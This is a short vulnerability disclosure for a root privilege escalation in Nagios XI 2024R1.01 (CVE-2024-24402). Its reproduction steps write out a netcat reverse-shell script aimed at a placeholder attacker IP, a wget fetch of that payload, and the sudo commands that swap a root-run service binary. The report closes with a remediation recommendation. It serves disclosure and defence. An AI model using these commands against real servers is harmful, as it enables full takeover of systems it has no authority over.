Vulnerability Report

CVE Disovered by: Jarod Jaslow (MAWK)

Vulnerability Details:

• Endpoint: Nagios XI Version 2024R1.01
• Vulnerability Type: Privilege Escalation from User "NAGIOS"
• Exploitation Result: Full root access on the target system

Steps to Reproduce:

1. Create a Fresh Instance of Nagios XI Version 2024R1.01:

• Download the Nagios XI OVA file from: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova
• Deploy the OVA to create a fresh instance. -Using my previous report gain RCE on the server

2. Abuse Privilege Escalation:

• As the user "NAGIOS," create a file on the attacker machine with the following content:

  #!/bin/bash
  nc -e /bin/bash <Attacker IP> 4445

• Host the file on the attacker machine via a Python HTTP server:

  python3 -m http.server 8000

• Start a Netcat (NC) listening server on the attacker machine:

  nc -nlvp 4445

3. Execute the Exploitation on the Victim Computer:

• Fetch the file from the attacker machine:

  wget http://<Attacker IP>:8000/npcd

• Execute the following commands to escalate privileges and receive a connection as root:

  sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
  cp npcd /usr/local/nagios/bin/npcd
  sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd

Recommendation:

It is recommended to restrict the ability of the user "NAGIOS" to write to Nagios service executables that are run as root. This can be achieved by implementing stricter file permissions and access controls for the relevant directories and files associated with Nagios services.

This should be fixed in new releases

CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402